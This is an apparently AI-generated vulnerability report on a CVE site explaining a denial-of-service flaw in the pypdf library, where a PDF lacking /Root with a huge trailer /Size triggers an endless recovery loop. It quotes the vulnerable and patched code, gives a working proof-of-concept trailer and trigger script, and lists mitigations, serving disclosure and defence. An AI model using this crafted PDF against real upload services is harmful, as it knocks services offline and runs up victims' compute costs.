CVEReports
CVEReports

Automated vulnerability intelligence platform. Comprehensive reports for high-severity CVEs generated by AI.

Product

  • Home
  • Dashboard
  • Sitemap
  • RSS Feed

Company

  • About
  • Contact
  • Privacy Policy
  • Terms of Service

© 2026 CVEReports. All rights reserved.

Made with love by Amit Schendel & Alon Barad



CVE-2026-22690
5.30.02%

The Never-Ending Story: Infinite Loops in pypdf

Amit Schendel
Amit Schendel
Senior Security Researcher

Feb 21, 2026·5 min read·5 visits

PoC Available

Executive Summary (TL;DR)

A resource exhaustion vulnerability in pypdf < 6.6.0 allows attackers to cause a Denial of Service (DoS) via malformed PDFs. By manipulating the trailer's `/Size` parameter and omitting `/Root`, the parser enters an unbounded loop.

Parsing PDFs is a thankless task, akin to translating ancient hieroglyphs written by a drunk scribe. `pypdf`, a popular Python library, tried to be helpful by 'fixing' broken files on the fly. Unfortunately, this benevolence created a massive denial-of-service vector (CVE-2026-22690). By simply omitting a root definition and lying about the file size, an attacker can force the library into a near-infinite search loop, pinning the CPU at 100% until the heat death of the universe—or until the OOM killer steps in.

The Hook: Kindness Kills

PDFs are notoriously broken. The specification is a sprawling mess of legacy debt, and most PDF writers generate garbage that only Adobe Reader—and a few brave open-source libraries—can parse. pypdf falls into the "brave" category. It includes a "non-strict" mode (often the default) designed to recover data from malformed files.

Here is the problem: recovery requires heuristics. When a PDF is missing critical structural elements, the library has to go hunting for them. In CVE-2026-22690, the library's hunt for a missing /Root object turns into a death march. The developers assumed that the file's trailer dictionary would honestly report the number of objects via the /Size key.

In the security world, we have a golden rule: Never trust input metadata. If a file header says "I have 10 billion objects," you don't start a loop that counts to 10 billion. But that is exactly what happened here. This isn't a buffer overflow or a fancy ROP chain; it's a logic flaw born of optimism.

The Flaw: Trusting the Liar

To understand this bug, you need to know how a PDF ends. The file concludes with a trailer dictionary, which points to the /Root (the catalog of the document) and usually includes a /Size key indicating the number of objects in the cross-reference table.

When pypdf operates in strict=False mode and encounters a PDF without a /Root pointer, it panics slightly. "No problem," it thinks, "I'll just scan all the objects to find one that looks like a Catalog."

How many objects does it scan? It asks the /Size key.

# The logic before the fix
nb = cast(int, self.trailer.get("/Size", 0))
for i in range(nb):
    # Expensive lookup operation
    o = self.get_object(i + 1)

See the issue? The attacker controls /Size. If I hand you a 1KB PDF file but set /Size to 2,147,483,647 (MAX_INT), the library dutifully attempts to resolve over 2 billion objects. Since the file is small and those objects don't actually exist, the get_object call fails, catches the exception, and continues to the next iteration. It spins the CPU for hours, doing absolutely nothing of value.

The Code: Adding a Safety Rail

The fix provided in version 6.6.0 is a classic "sanity check." The developers realized that while they want to recover broken files, they shouldn't spend eternity doing it. They introduced a hard limit on the recovery search.

Here is the diff analysis for pypdf/_reader.py:

The Vulnerable Logic:

if self._validated_root is None:
    # Blindly trust /Size
    nb = cast(int, self.trailer.get("/Size", 0))
    for i in range(nb):
        try:
            o = self.get_object(i + 1)
            # ... check if o is Catalog ...

The Fixed Logic (v6.6.0):

# Introduce a configurable limit (default 10,000?)
self._root_object_recovery_limit = (
    root_object_recovery_limit 
    if isinstance(root_object_recovery_limit, int) 
    else sys.maxsize
)
 
# ... inside the loop ...
for i in range(number_of_objects):
    # The Circuit Breaker
    if i >= self._root_object_recovery_limit:
        raise LimitReachedError("Maximum Root object recovery limit reached.")

This change ensures that even if /Size claims to be billions, the loop terminates after a reasonable number of attempts, preventing the CPU exhaustion.

The Exploit: Crafting the Poisoned PDF

Exploiting this is trivially easy. You don't need shellcode. You just need a text editor. A PDF is arguably just a text file with some binary blobs. We can construct a minimal "killer" PDF that consists of a header and a malicious trailer.

Step 1: The Header Standard PDF header. %PDF-1.7

Step 2: The Body We don't need a body. In fact, fewer objects make the parser hit the loop faster.

Step 3: The Malicious Trailer We omit /Root (triggering the recovery path) and set /Size to a 32-bit integer limit.

trailer
<<
  /Size 2147483647
>>
startxref
0
%%EOF

Step 4: The Trigger Load this into a Python environment:

from pypdf import PdfReader
 
# strict=False is often the default or explicitly set to handle "bad" PDFs
reader = PdfReader("poison.pdf", strict=False)
 
# Accessing pages triggers the root lookup
print(len(reader.pages))

Result: The process hangs. The fan spins up. The developer cries.

The Impact: Why Denial of Service Matters

You might shrug at a DoS. "So what? I restart the container." But consider where pypdf is used. It's the engine behind thousands of "Upload your Resume" portals, automated invoice scanners, and archival bots.

If you run a service that accepts PDFs from the public internet and processes them asynchronously:

  1. Resource Starvation: An attacker uploads 10 of these files.
  2. Worker Deadlock: 10 of your worker nodes get stuck in infinite loops.
  3. Service Outage: Valid users can't process documents.
  4. Cost Explosion: If you are on AWS Lambda or auto-scaling EC2, you are now paying for compute time that is doing nothing but counting to 2 billion.

In serverless environments, this is particularly nasty as it guarantees a timeout, maxing out the billed duration for every invocation.

The Fix: Update or Die

The mitigation is straightforward. If you are using pypdf, check your version.

Primary Mitigation: Upgrade to pypdf >= 6.6.0.

pip install pypdf --upgrade

Workaround (if you can't upgrade): Enforce strict parsing. This disables the recovery logic entirely. The side effect is that actually broken PDFs will raise an exception instead of being partially read—but that is better than your server melting.

reader = PdfReader(stream, strict=True)

If you must use older versions and allow non-strict parsing, wrap the processing logic in a strict timeout (e.g., using signal.alarm or async timeouts) to kill the process if it takes longer than a few seconds.

Official Patches

pypdfPull Request implementing the search limit

Fix Analysis (1)

Technical Appendix

CVSS Score
5.3/ 10
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L
EPSS Probability
0.02%
Top 95% most exploited

Affected Systems

pypdf < 6.6.0Python applications processing user-uploaded PDFs

Affected Versions Detail

Product
Affected Versions
Fixed Version
pypdf
py-pdf
< 6.6.06.6.0
AttributeDetail
CWE IDCWE-400 (Uncontrolled Resource Consumption)
CVSS v3.15.3 (Medium)
Attack VectorNetwork (Context-dependent)
ImpactDenial of Service (Availability)
Exploit StatusPoC Available (Trivial to construct)
EPSS Score0.00019 (Low Probability)

MITRE ATT&CK Mapping

T1499Endpoint Denial of Service
Impact
CWE-400
Uncontrolled Resource Consumption

The software does not properly control the allocation and maintenance of a limited resource, allowing an actor to influence the amount of resources consumed.

Known Exploits & Detection

ManualConstruct a PDF with missing /Root and trailer /Size set to 2147483647.

Vulnerability Timeline

Patch Committed (v6.6.0)
2026-01-09
GHSA Advisory Published
2026-01-10

References & Sources

  • [1]GHSA Advisory
  • [2]NVD Detail

Attack Flow Diagram

Press enter or space to select a node. You can then use the arrow keys to move the node around. Press delete to remove it and escape to cancel.
Press enter or space to select an edge. You can then press delete to remove it or escape to cancel.